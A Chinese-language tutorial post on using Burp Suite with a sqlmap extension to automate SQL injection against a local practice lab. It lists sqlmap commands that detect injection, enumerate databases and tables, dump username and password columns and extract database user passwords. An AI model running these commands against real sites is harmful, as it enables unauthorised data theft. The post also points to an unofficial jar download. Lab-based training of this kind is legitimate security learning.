返回

使用burp联合sqlmap进行自动化SQL注入测试

发布时间:2022-04-29 10:05:23 1305
# 漏洞# 工具# 扫描

使用burp联合sqlmap进行自动化SQL注入测试

0x01 burp配置sqlmap插件

1、下载sqlmap.jar扩展包

链接:https://pan.baidu.com/s/1NI-gvvlaydCAKk3Uo0GpXA
提取码:p0h9

2、添加sqlmap.jar扩展包

在burp中的extender–>add–>select file.

image-20220429091446151

添加成功后状态栏会出现 sqlmap 的选项

image-20220429091626413

0x02 sqlmap插件使用

1、将sqlmap添加到环境变量中

image-20220429092450086

然后sqlmap就可以在任意路径的命令行中使用了

image-20220429093815209

2、 开启一个sql注入的靶场

image-20220429091853236

然后开启burp抓包

image-20220429092001643

点击 Extensions ==> sqlmap ==> send to sqlmap

image-20220429093925631

成功完成sqlmap注入

image-20220429093952944

3、SQLMap入门

1.判断是否存在注入

sqlmap.py -u http://127.0.0.1/sql1/Less-1/?id=1

当注入点后面的参数大于等于两个时,需要加双引号。

sqlmap.py -u "http://127.0.0.1/sql1/Less-1/?id=1&uid=2"

2.判断文本中的请求是否存在注入

sqlmap.py -r desktop/1.txt

-r一般在存在cookie注入时使用。

3.查询当前用户下的所有数据库

sqlmap.py -u http://127.0.0.1/sql1/Less-1/?id=1 --dbs

4.获取数据库中的表名

sqlmap.py -u "http://127.0.0.1/sql/union.php?id=1" -D dkeye --tables

5.获取表中的字段名

sqlmap.py -u "http://127.0.0.1/sql/union.php?id=1" -D dkeye -T user_info --colums

6. 获取字段内容

sqlmap.py -u "http://127.0.0.1/sql/union.php?id=1" -D dkeye -T user_info -C username,password --dump

7.获取数据库的所有用户

sqlmap.py -u "http://127.0.0.1/sql/union.php?id=1" --users

8.获取数据库用户的密码

sqlmap.py -u "http://127.0.0.1/sql/union.php?id=1" --passwords

9.获取当前网站数据库的名称

sqlmap.py -u "http://127.0.0.1/sql/union.php?id=1" --current-db

10.获取当前网站数据库的用户名称

sqlmap.py -u "http://127.0.0.1/sql/union.php?id=1" --current-user

获取更多网络安全信息:
+Q Q群:863658976
V X公众号: 哈客部落
哈客社区:hake.cc

特别声明:以上内容(图片及文字)均为互联网收集或者用户上传发布,本站仅提供信息存储服务!如有侵权或有涉及法律问题请联系我们。
举报
评论区(0)
按点赞数排序
用户头像
精选文章
thumb 中国研究员首次曝光美国国安局顶级后门—“方程式组织”
thumb 俄乌线上战争,网络攻击弥漫着数字硝烟
thumb 从网络安全角度了解俄罗斯入侵乌克兰的相关事件时间线